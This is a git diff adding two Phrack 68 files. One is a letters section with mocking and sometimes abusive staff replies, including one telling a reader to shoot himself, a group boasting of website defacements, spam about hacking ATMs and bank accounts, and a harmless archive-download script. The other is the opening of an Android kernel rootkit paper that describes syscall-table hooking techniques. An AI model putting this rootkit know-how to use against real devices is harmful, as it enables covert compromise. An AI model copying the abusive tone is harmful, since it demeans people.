+--NickServ--   Is online since: Dec 21 17:26:15 2010 EET
+--NickServ--   Time registered: Oct 25 23:22:13 1999 EEST
+--NickServ-- Last quit message: Ping timeout
+--NickServ--    E-mail address: slasher@grhack.net
+--NickServ--           Options: Kill protection, Security, Private
+--NickServ-- *** End of Info ***
+
+
+Maybe spyadmin is closed by google blogspot after the emails of grhack.net
+Slasher cuz the stuff is related about him
+
+but look the comments of this website and the date, to know the existance
+of spyadmin
+
+http://press-gr.blogspot.com/2007/09/blog-post_3165.html
+
+(SOMETHING IN GREEK...)
+    spyadmin.blogspot.com
+    (SOMETHING IN GREEK AGAIN)
+    (7 September 2007)
+
+Now look also the date of the defacement in the zone-h digital archive:
+
+http://zone-h.org/mirror/id/6638423
+
+and look the date too,
+# Mirror saved on: 2007-09-08 13:58:32
+# * Notified by: GHS
+(8 September 2007)
+
+---
+
+Greek Hacking Scene has no colour and does not support any political side.
+
+Take example to indymedia athens, i will give you 2 links, in the first
+they say that GHS is nationalist and hack their website, and in the other
+link on the same website, they give congratulations in GHS cuz they did
+actions and defacements according to left ideology.
+
+In fact GHS has it's own ideology and act as GHS believe.
+
+1 link:
+http://athens.indymedia.org/front.php3?lang=3Del&article_id=3D706934
+
+2 link:
+http://athens.indymedia.org/front.php3?lang=3Del&article_id=3D620090
+
+The comments are yours, let see the Freedom of Speech now, the TRUE the
+REALITY, the FACTS!
+
+Somes they didn't learn from their mistakes. GHS has no hate for anyone and
+act not for revenge causes or anything else. According to all our actions,
+we do warning and when we act we just put the informations as is, we don't
+put sauses, you put sauses maybe.
+
+The reason i wrote this is the true and reality.
+
+Before some years there are many "hackers" in Greek chat rooms etc, they
+speak about theory and when kids comming to learn, they laught only at them
+and they make those kids to become like them, liers without education and
+knowledge, kids that become like them, to know just some words, theory
+without they know what for they speak about and to spend lost time chatting
+and destroy other kids comming. Members of GHS hacked and take access in
+most and almost all Greek websites, chat rooms, irc servers etc, that was
+security-hacking related. We are always here, maybe not the same persons,
+but members of GHS are change all the time and keep the safe ideology. In
+the other hand, we let teenagers who are interested to hacking, we turn
+them to coding, to let them think their future, education, freedom ideas
+and to let them want to do things and create. Defacements and Hacking are
+our fireworks to let them get the magic and on the way to show to them that
+there are so many tools and things on net to hack a website and hack, but
+if you want to go more further, you have to learn coding, to explore, to
+let your mind free and think far away, for what can be happen and what not.
+To go a step further with their minds, not by giving them stuff in the
+plate, but let them do it and explore it by their selfs! I know keeps that
+believe and do things, on the way they do things and go advance, those kids
+are the next cycle of GHS who will pass the same ideas, believes and
+technology to the next generations.
+
+Greek Hacking Scene 2010.
+
+    [ All we can say is 'What?' ]
+
+[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
+|--=[ 0x07 - Interesting mails ]=----------------------------------------=|
+[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
+
+
+From: "L. *****" <l.*******@yahoo.com>
+Subject: idea for next profile
+
+my you should do a hacker profile on j3ster since he is one of the most
+prominent hackers that I've heard about out there,
+
+    [ Dunno the guy. We already chose one anyway. You may have heard of
+      him. ]
+
+or do one on that rat who turned in bradley manning
+
+    [ The saying is not: Snitches get Prophiles. ]
+
+
+                                    ---
+
+From: infosec <infosec@cyberdo.net>
+Subject: Release date?
+
+Hi Guys,
+
+Firstly, let me thank you for the on-going release of this great
+e-zine.
+
+   [ You're welcome. ]
+
+Most of these e-zines surfaced and then disappears over the horizon yet
+albeit the long term delays in-between releases :)you've kept this
+going.
+Thank you.
+
+    [ ^_^ ]
+
+I am very much interested in the up and coming release and would like
+to know the date or drop us a note on the website.
+
+    [ Done. ]
+
+Also, I'd like to know how to join phrack team of staff.
+
+    [ There is a GREAT mystery about how the phrack staff acquires
+      members. Sorry dude, there is currently no open spot :) ]
+
+Greetz,
+infosec
+
+                                    ---
+
+From: Zagan Hacktop <zagan@live.co.uk>
+Subject:
+
+YO!
+do you still have an IRC?
+
+    [ We do. But it's a private one. We may open a public or half-public
+      one someday... Don't hold your breath however. ]
+
+                                    ---
+
+From: daniel ***** <******@gmail.com>
+Subject: new age LoD
+
+hi am a head of a team that disided that LoD
+is a legacy and cant just disappear... it must be reborn or the web will
+loose alot and with the way things are going today
+the web realy cant efored it or it will eventualy die for the simple
+user...
+
+we are looking for the original LoD members (or at list any way to
+comunicate with them)
+(specialy for night lightning)
+
+if this information can be passed to them it would be realy nice.. all we
+want is a some advice (not technical) ...
+
+
+my email is ******@gmail.com (nick: galeran).
+if you can help please do
+thanks
+
+    [ Not sure about the true intentions but anyway this might help.]
+
+
+[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
+|--=[ 0x08 - Greek people are angry  ]=----------------------------------=|
+[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
+
+
+    [ For clarification purposes, we received this mail after we released
+      the index and before we released the philes. ]
+
+                                    ---
+
+From: Iordanis Patimenos <iopatmenos@yahoo.gr>
+Subject: Phrack 67
+
+    [ So what, another greek? At least this one is not complaining about
+      the scene phile ;) ]
+
+YEAR: 2010, OSs:64-bit, protection mechanisms: ASLR, DEP, NX, .... , Attack
+ mechanisms: JAVA VM exploitation, Flash VM exploitation, ... the only
+thing you had to do was to let the knowledge flow.
+
+    [ The only thing? Such a nice little kid daydreaming :) ]
+
+What to do the info in 'Scraps of notes on remote stack overflow
+exploitation', 'Exploiting Memory Corruptions in Fortran Programs Under
+Unix/VMS' (FORTRAN wtf),
+
+    [ FORTRAN... indeed :') We'll do something about COBOL as well (it is
+      'safe' so no memory corruptions, something else). We'll keep you
+      posted. ]
+
+'A Eulogy For Format Strings' if we cannot apply on current protection
+mechanisms.
+
+    [ Well that's the point. You can. Oh wait, you would have known if 
+      you had kept your sorry mouth shut and actually read the papers 
+      first :> ]
+
+New edit or better you didn't publish this new fucking delayed, bad content
+phrack p67, BIG FAIL, that's not the PHRACK we know. What a retarded
+content you provided after all this waiting time!!! Not a chance to compare
+to previous phrack issues. This issue is just a joke, nothing more, happy
+1st APril assholes, you made PHRACK seems trash magazine.
+
+    [ The cool thing with morons like you is that it would be pointless to
+      explain things, which makes our job somewhat easier. Congratulations
+      for your participation in p68, you've made it ;-) ]
+
+-Fan of Phrack-
+
+    [ Yes. It shows. ]
+
+                                    ---
+
+From: Nikol Eleutheriou <nikoletaki_87@yahoo.gr>
+Subject: JUNE 2011: PHRACK ISSUE #68 ... YES _THAT_ SOON
+
+    [ Another desperate housewife? The name is familiar...]
+
+YOU ARE SO FUCKING FUNNY
+
+    [ WE DO HOPE WE ARE ]
+
+I'M SURE THE NEW ISSUE WILL BE SUCH A FAIL AS THE PREVIOUS ONE (THE ONE
+THAT YOU TRIED TO ADVERTISE AS A BIG HIT)
+
+    [ OHHHHH A BIG HIT REALLY? DAMMIT MY CAPSLOCK IS REALLY FUCKED. ]
+
+JUNE 2011: PHRACK ISSUE #68 ... YES _SUCH_A_FAIL
+
+    [ NOT IN JUNE, WE ARE *ALWAYS* LATE ]
+
+                                    ---
+
+From: Nikol Eleutheriou <nikoletaki_87@yahoo.gr>
+Subject: JUNE 2011: PHRACK ISSUE #68 ... YES _THAT_ SOON
+
+Group: The Phrack Staff
+
+    [ Hum, it seems that you have fixed the capslock problem.
+      You're elite. ]
+
+Most *FAIL* group ever in phrack, you hurt the magazine go away.
+
+    [ Hey now I remember you!!! :) It looks like you are obsessed with us.
+      You must be our number one fan in greece. Even now that we have so
+      many greek fans. ]
+
+    >>>>>>>>>> From earlier >>>>>>>>>>
+    From: Nikol Eleutheriou <nikoletaki_87@yahoo.gr>
+    Subject: Phrack issue 58
+
+    How can i get the binary-encryption.tar.gz
+    from the article Runtime binary encryption?
+    >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
+
+    [ So:
+        1. Did you manage to download the file? :)))))
+        2. *EPIC* *FAIL*?
+    ]
+
+                                    ---
+
+From: Nikol Eleutheriou <nikoletaki_87@yahoo.gr>
+Subject: New phrack issue
+
+    [ What? You again? ]
+
+Marry Christamas :) and happy New York
+
+    [ LOL. You're doing it wrong! ]
+
+
+[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
+|--=[ 0x09 - PHRACK got spam'd? ]=---------------------------------------=|
+[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
+
+
+From: ***** ******** <darkjoker93@gmail.com>
+Subject: ANTISPAM
+
+Hi guys :)
+Here's an article I've just written, I know it's a bit late for the
+submissions, but perhaps you may publish it in the next issue. Anyway, the
+topic is how to bypass a captcha, and, in particular, how to bypass the one
+on your site :). No offense, but it's really weak.
+
+    [ None taken. We simply took the first capcha mechanism available on
+      the web which was not going to get us owned. However we got spam,
+      that's for sure, sorry about that fellow readers. ]
+
+If you don't find it interesting please at least change your captcha
+because I'm really sick (and I'm sure I'm not the only one) of reading
+spam messages (I swear it was not me :).
+
+    [ We'll do both so that you can get better :> ]
+
+I'm italian, therefore my english is not very good,
+
+    [ Nobody's perfect! ]
+
+if the paper is so bad written it can't be even read, send it back to me,
+I'll try to rewrite it in a better way.
+
+Bye,
+darkjoker
+
+    [ And that's the story of how his contribution got published in
+      Linenoise. Thx darkjoker. ]
+
+                                    ---
+
+[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
+|--=[ 0x0A - The urge to get p68!!! ]=-----------------------------------=|
+[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
+
+
+From: Barak ***** <barak*****@gmail.com>
+Subject: Question
+
+    [ This one is not the current president of the US, we checked. ]
+
+Hi,
+
+I have been following the magazine for a while now and I have been waiting
+for the new issue. Last I checked it was suppose to come out in June...
+Can you let me know when I should except the new issue?
+
+    [ Are you reading this? Then issue #68 is out. You're welcome. ]
+
+Barak
+
+    [ That's the problem with every issue, you should NEVER trust us when
+      we announce dates ;) ]
+
+                                    ---
+
+From: Rodri ***** <rodrigo******@hotmail.com>
+Subject:
+
+    [ Hey ANTISPAM is missing! ]
+
+Hello,
+
+For godsake we are already in June!
+
+    [ Sorry about that bro :) ]
+
+Now seriously and kindly is it coming out soon?
+
+Best regards.
+Roders.
+
+                                    ---
+
+From: LEGEND XEON <legend.xeon@gmail.com>
+Subject: Phrack 68th Issue Release
+
+Hello mate,
+I am very interested in upcoming 68th issue of phrack.
+The whole world is counting on you!!
+
+    [ The whole world? Not even the whole scene mate ;) ]
+
+I just want to know when will be the release and can you give me a glimpse
+of contents inside it.
+I will be eagerly waiting for your reply.
+
+    [ Hehe, hope you didn't wait too much. ]
+
+~Legend_Xeon
+
+                                    ---
+
+From: fernando ****** <core******@gmail.com>
+Subject:
+
+my life gets duller every day you don't release the new issue
+
+    [ Let's hope this one didn't commit suicide before we released :| ]
+
+
+[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
+|--=[ 0x0B - Students project? ]=----------------------------------------=|
+[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
+
+
+From: "(s) Charmaine Anderson" <Charmaine.Anderson@students.newport.ac.uk>
+Subject: Creating Middle-Ware for Distributed Cryptanalytic Applications
+
+To whom it may concern,
+
+I am contacting you to tell you about my final year project for my degree.
+I would be very grateful if you were able to follow my progress and perhaps
+ also contribute any tips and ideas. I will also be writing an application
+which, if successful, I will be posting online for download.
+
+Using the RC5 block cipher and the competitions run by RSA Laboratories
+(1997-2007) as benchmarks, experiments will be conducted using different
+methods of distributed computing. The implications of the results will lead
+to a better understanding of how cryptanalysis can be conducted through
+areas such as grids and internet-based cloud computing or virtualisation.
+
+The reason for this project is that distribution methods have been used for
+many years in order to conduct cryptanalysis; however, I have noticed that
+this has been for purposes such as testing the security of new ciphers and
+creating a better understanding of how they work. But, to my knowledge,
+there has been little-to-no research into the implications of real-world
+attacks through distribution.
+
+To summarise, I plan to test the limits of computational security in order
+to expose the possibility of real-world cryptanalytic attacks using the
+'unlimited' computing power that is slowly becoming available to the
+public.
+
+It is possible to follow the progress of this project through
+http://www.distributedcryptanalysis.co.uk/. A number of blogs are also
+being used in order to attract more interest, links to these will be posted
+on the website very shortly.
+
+Yours Sincerely,
+
+Charmaine Anderson
+
+BSc (Hons) Forensic Computing
+University of Wales, Newport
+
+    [ Well he seemed to be a good kid so we published his mail ;) ]
+
+                                    ---
+
+From: Johannes Mitterer <johannesmitterer@googlemail.com>
+Subject: Hacker's Manifesto
+
+Dear Phrack-Team,
+
+currently I'm working on my bachelor's thesis part of which is an analysis
+of The Mentor's Hacker's Manifesto. In this context, there's little
+confusion about the question how the manifesto was first published. As I
+understand it, the manifesto was first published ONLINE in phrack magazin,
+whereas my professor stated that the first issues of phrack including Issue
+#7 in which the manifesto was published were only available offline as a
+printed version and later put on the internet. Perhaps You could help me
+clearing up this confusion.
+
+    [ Wasn't the early edition of phrack all scene .txt philes on BBSes?
+    Like, #7 was pre internet for sure. I doubt that any of the editors
+    back then would have bothered printing hardcopies, since it is
+    extremely inefficient and expensive and the target audience is ppl w/
+    computers. ]
+
+Thanks in advance!
+
+Yours,
+Johannes Mitterer
+
+[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
+|--=[ 0x0C - Phrack & the chicks ]=--------------------------------------=|
+[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
+
+
+From: kimberly - <*******@hotmail.com>
+Subject: Graduate essay
+
+Hello Staff,
+We are senior high school students from 'Stella Maris College' in the
+Netherlands and we are writing an essay about the reputation of hacking. If
+it is okay with you, we would like to ask a few questions:
+- How could you start the site, because hacking is illegal and it might
+  endanger your users who discuss hacking?
+
+    [ Wait it's illegal? We're shutting down the site immediately :| ]
+
+- Have you ever gotten negative/positive reactions to your site? And what
+  where those reactions?
+
+    [ Well everything is in this file :D ]
+
+- Is there any information that is not known to people who are not hackers
+  and that is not easy to find in books or the internet? If so, where could
+  we find this information?
+
+    [ IRCS? Nah it's just for the chitchat :) ]
+
+- Is there anything in your opinion that is so important, that we can't
+  possibly leave out? We would be very happy if you could answer these
+  questions or forward this email to someone who might know more about
+  this.
+
+    [ I'm not too sure you guys will be able to graduate with that many
+      questions so good luck :D ]
+
+Thank you very much in advance!
+- Dingding and Kimberly
+
+                                    ---
+
+From: Eva ******* <*****@gmail.com>
+Subject: Article
+
+Dear Phrack Staff,
+
+I'm preparing an article concerning some hacks to Linden Lab's SecondLife
+viewer and I would like to publish the results in your magazine. Could you
+please, if possible, provide some details where and to whom I should send
+it to and if there are any requirements I must fulfil.
+
+Thank you,
+Eva
+
+    [ We published the paper in the linenoise.
+      Thanks for the submission Eva! Nice pics btw ;> ]
+
+[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
+|--=[ 0x0D - ROFL ]=-----------------------------------------------------=|
+[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
+
+
+From: ***** ***** <****.*****.****@gmail.com>
+Subject: script
+
+Man, I was bored taking a break from working on a vpn project at a library
+and decided to make a script in bash to download and decompress the phrack
+mags. Its newb meat but I guess Im just going to send it in for you guys to
+laugh at, rofl.
+
+    [ ROFL indeed. ]
+
+---
+Jackie ***** ****** - *"Focus on Solutions not Problems"*
+
+    [ But you create solutions for non existent problems :D ]
+
+Email0: *****.*****.*****@gmail.com
+Email1: skraps_rwt@yahoo.com
+
+    [ We added the script below. If someone could help Nikol Eleutheriou to
+      decrypt it so that she doesn't complain please... ]
+
+begin-base64 644 getPhrack.sh
+IyEvYmluL2Jhc2gKCiNDVVJJU1NVRT0iNjciClVSTD0iaHR0cDovL3d3dy5w
+aHJhY2sub3JnL2FyY2hpdmVzL3Rnei8iCkVaSU5FRElSPSIvaG9tZS9za3Jh
+cHMvZXppbmVzL3BocmFjay8iCkNVUklTU1VFPWBHRVQgaHR0cDovL3d3dy5w
+aHJhY2sub3JnLyB8IGdyZXAgSVNTVUUgfCBjdXQgLWIgNTAtNTFgCiNwaHJh
+Y2s2Ny50YXIuZ3oKCmNkICRFWklORURJUgoKZXhpdHN0YXQoKXsKCWlmIFsg
+JD8gPT0gIjAiIF07IHRoZW4KCQllY2hvICJFeHRyYWN0aW9uIHN1c2NjZXMi
+CgllbHNlCiAgICAgICAgICAgICAgICBlY2hvICJFeHRyYWN0aW9uIGZhaWxl
+ZCIKICAgICAgICBmaQp9Cgpmb3IgKCggeD0xOyB4PCRDVVJJU1NVRTsgeCsr
+ICkpOyBkbwoJaWYgWyAtZiAke0VaSU5FRElSfXBocmFjayR7eH0udGFyLmd6
+IF07IHRoZW4KCWVjaG8gIklzc3VlICR4IGV4aXN0cyIKCQlpZiBbIC1lICR7
+RVpJTkVESVJ9JHt4fSBdOyB0aGVuCgkJCWVjaG8gIklzc3VlIHByZXZpb3Vz
+bHkgZXh0cmFjdGVkIgoJCWVsc2UKCQkJZWNobyAiRXh0cmFjdGluZyBJc3N1
+ZSAkeCIKCQkJdGFyIHp4ZiAke0VaSU5FRElSfXBocmFjayR7eH0udGFyLmd6
+CgkJCWV4aXRzdGF0CgkJZmkKCWVsc2UKCgkJZWNobyAiRG93bmxvYWRpbmcg
+aXNzdWUgJHggLi4uLiIKCQlHRVQgJHtVUkx9cGhyYWNrJHt4fS50YXIuZ3og
+PiAke0VaSU5FRElSfXBocmFjayR7eH0udGFyLmd6CgkJZWNobyAiRG9uZSBk
+b3dubG9hZGluZyBpc3N1ZSAkeCAuLi4uIgoJCWVjaG8gIkV4dHJhY3Rpbmcg
+aXNzdWUgJHgiCgkJdGFyIHp4dmYgJHtFWklORURJUn1waHJhY2ske3h9LnRh
+ci5negoJCWV4aXRzdGF0CglmaQpkb25lICAK
+====
+
+                                    ---
+
+From: Tom <thom128@gmail.com>
+Subject: Phrack Rules The World!
+
+Hi there,
+
+I like hacking but I never done it.
+
+    [ So how do you know that you like it? ]
+
+Wrote a poem about it.
+
+    [ Was it worth it? ]
+
+I wanna work in IT as systems admin.
+
+    [ Hem... ok? Why? :) ]
+
+Please publish my poem in your magazine.
+
+    [ Done! ]
+
+Phrack Rules!
+
+    [ Sure it does! ]
+
+Heil from London, England.
+
+Razor Tech Warrior
+
+They told you that you were nothing
+Just another name and number
+They said you were dumb and dumber
+
+But you stole
+Their lives away
+Network Nazi
+Live to fight another day
+
+    [ Network Nazi Live to fight another day <-- WTF ???? ]
+
+Through the black
+Of the nights metal sheets
+In tower blocks and tenements
+Cyber crime it breeds
+
+The government will stomp you out
+But burn their kernel
+Lock it down
+While others are still asleep.
+
+    [ We are speechless. All we can say is: LOL. ]
+
+                                    ---
+
+From: Tom <thom***@gmail.com>
+Subject: Some Photos From London
+
+Hi there,
+
+Just thought i would send u some pics of me and my family/friends. i love
+the mag am a big fan...keep up the good work.
+
+    [ And he really sent us pics. Your Grandma seems nice btw but you look
+      like a virgin geek unfortunately :( ]
+
+                                    ---
+
+From: b-fox <*****@bol.com.br>
+Subject: Hey... Mother fucker
+
+    [ Hey. p0rn industry calls it MILF fucking ]
+
+Wait my document... I'm gonna write I paper today about/regarding bomb
+development and something abt legislation in general. Huge hug!
+
+    [ Priceless. :') ]
+
+[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
+|--=[ 0x0E - Shame Shame Shame.......shame on you ]=---------------------=|
+[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
+
+
+From: varenya mehta <varenya2007@yahoo.co.in>
+Subject: ANTISPAM
+
+Run both ethernet and phone over existing Cat-5 cable
+
+    [ Cool! New submission! \o/ ]
+
+The new fad when building a house is to run Cat-5 cable to every wall jack.
+These jacks can then be used for either ethernet or phone. When we got our
+new house built, we chose to get four of these jacks, and we intended to
+use them for phone service. Unfortunately, the wifi is a bit flaky in
+places (even with two access points.) This got annoying up until the point
+where three of the four wall jacks were being used for ethernet, leaving
+just one for phone. This was a problem.
+
+The solution is to run both ethernet and phone over the same existing cat-5
+cable. Every wall jack becomes two jacks, one RJ-11 for phone and one RJ-45
+for ethernet. This neat hack could save you a lot of money, as you only
+have to buy new wall plates and jacks rather than wall plates, jacks, and
+hundreds of feet of wire.
+
+    [ Really cool hack. This one may fit in the linenoise :) ]
+
+[...]
+
+Also note that this procedure will not work with PoE (Power over Ethernet)
+devices. Nothing bad will happen, it just won't transmit power. See step 13
+for apossibly unsafe way to keep your PoE and add phone service. Also, it
+will not work with gigabit ethernet-- gigabit ethernet uses all four pairs.
+It will work fine at 10/100 Mbps which is sufficient for most people
+
+    [ Wait! Something is wrong. What is step13 and aren't a few things
+      missing? Let's google() a bit...
+
+      @(X_X)@
+
+      http://www.instructables.com/id/Hack-your-House-Run-both-ethernet-
+      and-phone-over-/
+
+      So not only did you send us a ripped paper. But you idiot were not
+      smart enough to click on "Next step" to copy the whole. LOL. ]
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+P.S. -please reply whether my submission will be added or not in this
+edition of ur highly esteemed Phrack magazine...loking forward to your
+reply :)
+cheers
+
+    [ Ur highly esteemed Phrack magazine would recommend to go shoot
+      yourself. ]
+
+
+[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
+|--=[ 0x0F - Insanity or SPAM??? ]=--------------------------------------=|
+[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
+
+                                    ---
+
+From: John Smith <devils-advocate-666@live.com>
+Subject: Dear staff(at)phrack[DOT]org; I love what you guys do for the
+U.S.A! Can you email your e news letters too please? Thank you.
+
+Can you please add me to your e-news letter list, so that I can recieve new
+updates from your cite? I totally loved what you guys had written about ai,
+and mind hacking and about hacking for the U.S. and Cypher Punks & Ninja
+Strike Force! Best of luck to all of you staff members at Phrack! I would
+like to know if you guys could please email me back some information in
+regards about rsome bank accounts that was on CRYPTOME, or if you guys
+could tell me about how you all had cash flow that came from hacked ATM
+terminals that you guys had done remotely, because I need to be hacking
+systems right now and I had all of my stuff jacked and I was robbed with
+all of your softwares that I had for CIA/ NSA and I've been trying to log
+onto some banking systems for my  CIA/ NSA digital cash, or could you guys
+send me some lock picks, or DIE BOLD keys to open some safes and vaults or
+could you send me some Cypher Punks white paiges or other instructions to
+interceptor frozen accounts on line and or how to obtain money for starting
+a Cypher Punks EBB & FLO system to develope an agriculture business plan
+that will help finance money for CIA & NSA op (ie- with IQT and with
+Foresight Nanotechnology Institute and with CTBA.org) to counter the HASHID
+culture?   Such as GSPC in Morocco and in Algeria, GIA, FIS, ETI, AQIM,
+Sahel Pan, DR-CONGO, AQAP, Hezbollah, HAMAS, Hizbullah, IMU, and fighting
+against the salafyists in the Magreb's EU-Arabia HASHID zones, and against
+the EVIL EMPIRE's MOIS, MEK, MEKO, PKK, VEVAK, ISI, FSB, KGB, NAK, GRU, and
+Brazillian Guerillas and Chychenian Rebels and mob and Russian Mob for
+GAZPROM Russian Mob Oil Monopoly and countering all of these groups members
+and contacts and countering their economic insugernt threats
+internationally, by hacking into their networks and locating them with RNM
+ai, and blood clotting the Evil Empire, and moving and on the GO like CIA
+backing the "Wrath of GOD" and with the Cult of CIA's MKULTRA program, and
+I mean redndering synapsial "WET WORK" by taking their ballance with the
+"EXIT BLOW," for NSA/ CIA's Ninja Strike Force and I want to be taking our
+threats to the Land of Snow and flurries will show me to the rest of their
+Evil Empires members locations by terminating them with Illuminati and I'll
+be hacking their minds and their bank accounts and stealing all of their
+wealth and contacts and other intelligence for RED Team, and taking their
+materials as loot, and sending it onto an encrypted site, but I want to
+creat my own ai online site with grant.gov grant money asap, and then once
+that's done I can go and locate them with RNM ai, but I would like  aving
+somean ai quantum consciousness program with a self assembling "FOG" EW ai
+HDD quantum computer with an infinite memory that would allow me to hack
+bank accounts with an ip installed with nano-bio-technologies with inner
+cellular blood vessel programming and cellular mind net morphing
+technologies with RNM, nanotechnology made with a neuronal networking and
+has a 3-d holographic video and 3-d holographic audio with real world and
+mirror world ai 3-d/ 4-d softwares for an online Cypher Punks & Ninja
+Strike Force & Cult of Dead Cow members with other CIA/ NSA Intelligence
+Analysis Cammander's of Red Teaming (aka- COUNTER-INTELLIGENCE TEAM's ALPHA
+& BRAVO:) Black Ops- Red Teaming  forum with an ai 3-d GOOGLE EARTH PRO GPS
+softwares with a soft mobi GLOBAL IP softwares package STEALTH NINJA phone
+with SIG PRO Telecommunications softwares for NSA & CIA CT:qto let me know
+about a should
+
+Tchao with Respect-
+Fabian.
+
+	[ What the fuck is that shit??? ]
+
+                                    ---
+
+From: John Smith <devils-advocate-666@live.com>
+Subject: ANTISPAM
+
+	[ Hey it's you again! ]
+
+Dear Phrack magazine,
+Hello my name is SA John Smith, I'm from No Town, VA. but moved to
+Brosnan, Missouri a few years back, and just recently moved to the huge
+L.A.; but, I would like to discuss some about covering some articles
+about Konkrete Jungle music parties and drum and bass massives done
+internationally, to help promote Cypher Punks Ebb & Flo Garden's and
+to help promote Covert Operations and Covert Actions for Cypher Punks,
+Ninja Strike Force, CIA MK-ULTRA and Red Teaming financing and donation
+sources to do shadowing, spike zones, drop deads, and some net working
+for some brush offs of information, softwares, and to cache equipment
+and personell at Squats (ie- abbandonned buildings, subway stations,
+subterrainean tunnels, Ligne Imagineaux types of areas, beach houses,
+Four Seasons Resort, casino's, Def Con Seminar, yahts, and other jungle
+music parties and be for the U.S. like the Maquis- WWII French Resistance,
+OSS, OAS, SIS, CSIS, CIA, Mossad, Shin Bet, NSA, and others from NATO and
+U.S. Coalition Forces, and some U.N. Merc's and other types of PMCS's
+Mercenaries for hire;) But, also covering atm hacking, to recieve cash
+and Flow in Game Theory like doing Parkour tricks in Mirror's Edge for
+Intelligence Analysis Red Team Well, I gotta go now, best wishes to you
+all, and I'll contact you again, or better yet, just contact me with ai,
+and we can meet up.
+
+Tchao-
+The Devils Advocate.
+
+	[ Spamming or brainfucked? ]
+
+|--=[ EOF ]=-------------------------------------------------------------=|
diff --git a/phrack68/6.txt b/phrack68/6.txt
new file mode 100644
index 0000000..727db0b
--- /dev/null
+++ b/phrack68/6.txt
@@ -0,0 +1,1073 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x44, Phile #0x06 of 0x13
+
+|=-----------------------------------------------------------------------=|
+|=-----------=[ Android platform based linux kernel rootkit ]=-----------=|
+|=-----------------------------------------------------------------------=|
+|=-----------------=[ dong-hoon you <x82@inetcop.org> ]=-----------------=|
+|=------------------------=[ April 04th 2011 ]=--------------------------=|
+|=-----------------------------------------------------------------------=|
+
+--[ Contents
+
+  1 - Introduction
+
+  2 - Basic techniques for hooking
+    2.1 - Searching sys_call_table
+    2.2 - Identifying sys_call_table size
+    2.3 - Getting over the problem of structure size in kernel versions
+    2.4 - Treating version magic
+
+  3 - sys_call_table hooking through /dev/kmem access technique
+
+  4 - modifying sys_call_table handle code in vector_swi handler routine
+
+  5 - exception vector table modifying hooking techniques
+    5.1 - exception vector table
+    5.2 - Hooking techniques changing vector_swi handler
+    5.3 - Hooking techniques changing branch instruction offset
+
+  6 - Conclusion
+
+  7 - References
+
+  8 - Appendix: earthworm.tgz.uu
+
+
+--[ 1 - Introduction
+
+This paper covers rootkit techniques that can be used in linux kernel based
+on Android platform using ARM(Advanced RISC Machine) process. All the tests
+in this paper were performed in Motoroi XT720 model(2.6.29-omap1 kernel)
+and Galaxy S SHW-M110S model(2.6.32.9 kernel). Note that some contents may
+not apply to all smart platform machines and there are some bugs you can
+modify.
+
+We have seen various linux kernel hooking techniques of some pioneers([1]
+[2][3][4][5]). Especially, I appreciate to Silvio Cesare and sd who
+introduced and developed the /dev/kmem technique. Read the references for
+more information.
+
+In this paper, we are going to discuss a few hooking techniques.
+
+	1. Simple and traditional hooking technique using kmem device.
+	2. Traditional hooking technique changing sys_call_table offset in
+	   vector_swi handler.
+	3. Two newly developed hooking techniques changing interrupt
+	   service routine handler in exception vector table.
+
+The main concepts of the techniques mentioned in this paper are 'smart' and
+'simple'. This is because this paper focuses on hooking through modifying
+the least kernel memory and by the simplest way. As the past good
+techniques were, hooking must be possible freely before and after system
+call.
+
+This paper consists of eight parts and I tried to supply various examples
+for readers' convenience by putting abundant appendices. The example codes
+are written for ARM architecture, but if you modify some parts, you can use
+them in the environment of ia32 architecture and even in the environment
+that doesn't support LKM.
+
+
+--[ 2 - Basic techniques for hooking
+
+sys_call_table is a table which stores the addresses of low-level system
+routines. Most of classical hooking techniques interrupt the sys_call_table
+for some purposes. Because of this, some protection techniques such as
